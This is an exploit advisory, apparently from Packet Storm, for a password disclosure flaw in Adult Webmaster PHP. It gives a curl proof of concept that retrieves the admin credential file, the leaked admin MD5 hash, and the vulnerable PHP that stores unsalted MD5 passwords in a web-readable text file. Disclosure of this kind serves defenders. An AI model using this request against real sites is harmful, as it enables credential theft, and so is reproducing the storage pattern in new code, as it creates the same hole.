Adult Webmaster PHP suffers from a remote password disclosure vulnerability.
5d256374da1c00ac65c89f84b2c767a7ce7a1f53d34c06fd56dd71fcdf7c38b1##########################################################################
[+] Exploit:Adult Webmaster PHP - Password Disclosure #
[+] Author: vinicius777 #
[+] Email/Twitter: vinicius777 [AT] gmail @vinicius777_ #
[+] Vendor Homepage: http://sourceforge.net/projects/adultweb/ #
##########################################################################
[1] Administrative Credential Disclosure
PoC:
root@kali:/# curl http://localhost/home/caspers/public_html/demo/admin/userpwdadfasdfre.txt
admin:3a4ebf16a4795ad258e5408bae7be341
#
Vulnerable Code:
[+] admin/common.php
// Check user existance
$pfile = fopen("userpwdadfasdfre.txt","a+");
rewind($pfile);
while (!feof($pfile)) {
$line = fgets($pfile);
$tmp = explode(':', $line);
if ($tmp[0] == $user) {
$errorText = "The selected user name is taken!";
break;
}
}
// If everything is OK -> store user data
if ($errorText == ''){
// Secure password string
$userpass = md5($pass1);
fwrite($pfile, "\r\n$user:$userpass");
}
fclose($pfile);
#
#
# Greetz to g0tm1lk and TheColonial.
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed